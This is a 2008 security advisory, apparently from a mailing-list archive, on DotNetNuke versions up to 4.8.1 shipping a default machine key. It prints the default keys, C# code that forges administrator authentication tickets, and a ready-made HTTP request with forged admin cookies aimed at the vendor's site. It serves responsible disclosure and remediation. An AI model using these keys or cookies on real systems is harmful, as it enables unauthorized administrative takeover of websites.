<<< Date Index >>>     <<< Thread Index >>>

DotNetNuke Default Machine Key Exposure

===========================================================
DotNetNuke Default Machine Key Exposure
Public Release Date: March 20, 2008
Brian Holyfield - Gotham Digital Science (labs@xxxxxxxxxxxxxxx)
Affected Software:  DotNetNuke <= 4.8.1
Severity: Critical

===========================================================
1. Summary
===========================================================

DotNetNuke (DNN) is an open-source Web Application Framework used to create and 
deploy websites.  The default web.config files distributed with DNN include an 
embedded Machine Key value (both ValidationKey and DecryptionKey).  Under 
certain circumstances these values may not be updated during the 
installation/upgrade process, resulting in the ability for an attacker to forge 
arbitrary ASP.NET forms authentication tickets that can then be used to 
circumvent all security within a DNN installation.  This issue was confirmed to 
affect the production instance of DNN used on the DNN Homepage 
(www.dotnetnuke.com).  

The vendor (DotNetNuke Corporation) was notified of this issue on March 3, 
2008.  The vendor responded by releasing version 4.8.2 on March 19, 2008 and 
has also issued a security bulletin 
(http://www.dotnetnuke.com/News/SecurityBulletins/SecurityBulletinno12/tabid/1148/Default.aspx).


===========================================================
2. Technical Details
===========================================================

The default web.config files distributed with DotNetNuke (DNN) include the 
following embedded ValidationKey and DecryptionKey values:

<machineKey
  validationKey="F9D1A2D3E1D3E2F7B3D9F90FF3965ABDAC304902"
  decryptionKey="F9D1A2D3E1D3E2F7B3D9F90FF3965ABDAC304902F8D923AC"
  decryption="3DES"
  validation="SHA1"/>

Normally, these values are overwritten by the web-based installation wizard 
during the initial website setup process.  Specifically, the 
Config.UpdateMachineKey() routine is called during the initial installation 
process.  Under certain scenarios where the web server user account does not 
have access to update the web.config file during installation, the default 
value will fail to be updated resulting in a DNN installation that uses these 
values for authentication token encryption and validation.  It is unclear how 
widespread this issue could potentially be, however it was confirmed that the 
production instance of DNN used on the DNN Homepage (www.dotnetnuke.com) was 
affected by this issue.  
 

===========================================================
3. Proof-of-Concept Exploit
===========================================================

This vulnerability is trivially exploited against any DNN installation using 
the default ValidationKey and DecryptionKey values.  In order to exploit this 
issue, two forged cookies (named ?.DOTNETNUKE? and ?portalroles?) must be 
generated.  The ?.DOTNETNUKE? cookie is used by the ASP.NET Forms 
Authentication Provider to identify the authenticated user, while the 
?portalroles? cookie is used by DNN to store role memberships for the current 
authenticated user.  

The following c# code excerpt, when run from an ASP.NET web form configured to 
use the default ValidationKey and DecryptionKey values, can be used to generate 
the two required FormsAuthenticationTicket values required to exploit this 
issue:


      // Step 1: Generate the two FormsAuthenticationTickets
      FormsAuthenticationTicket  ticket1 = new 
FormsAuthenticationTicket("admin", true, 10000);
      FormsAuthenticationTicket ticket2 = new FormsAuthenticationTicket(2, 
"admin", System.DateTime.Now, System.DateTime.MaxValue, true, "Registered 
Users;Subscribers;Administrators");


      // Step 2: Encrypt the FormsAuthenticationTickets
      string cookie1 = ".DOTNETNUKE=" + FormsAuthentication.Encrypt(ticket1);
      string cookie2 = "portalroles=" + FormsAuthentication.Encrypt(ticket2);


The two cookie strings produced by the above code, as shown in the request 
below, can be used to obtain administrator level access to DNN installations 
affected by this issue.

NOTE: The exact cookie values shown below can be used for testing & exploits.

GET /default.aspx HTTP/1.1
Host: www.dotnetnuke.com
Cookie: portalroles=CB14B7E2553D9F6259ECF746F2D77FD15B05C5A
10D98225339D6E282EFEFB3DA90D0747CEE5FAF2E7605B598311BA3349D
25C108FBCEC7A0141BE6CDA83F2896342FBA33FFD8CB18D9A8896F30182
B9EEB47786AB9574F6F3EBD9ECF56C389B401BCF744224A869F4C23D5E4
280ACC8E16A2113C0770317F3A741630C77BB073871BE3E1E8A6F67AC5F
0AC0582925D690B1D777C0302E18E;.DOTNETNUKE=6BBF011195DE71050
782BD8E4A9B906F770FEDF87AE1FC32D31B27A14E2307BF986E438E06F4
B28DD30706CB516290D5CE1513DD677E64A098F912E2F63E3BE3DDE6380
9B616F614


===========================================================
4. Recommendation 
===========================================================

DotNetNuke v4.8.2 has been released by DotNetNuke Corporation, which 
specifically addresses this issue.  Additionally, check your web.config file to 
ensure that the validationkey value is not set to 
"F9D1A2D3E1D3E2F7B3D9F90FF3965ABDAC304902".


===========================================================
5. About Gotham Digital Science 
===========================================================

Gotham Digital Science (GDS) is an international security services company 
specializing in Application and Network Infrastructure security, and 
Information Security Risk Management. For more information on GDS, please 
contact info@xxxxxxxxxxxxxxx or visit http://www.gdssecurity.com.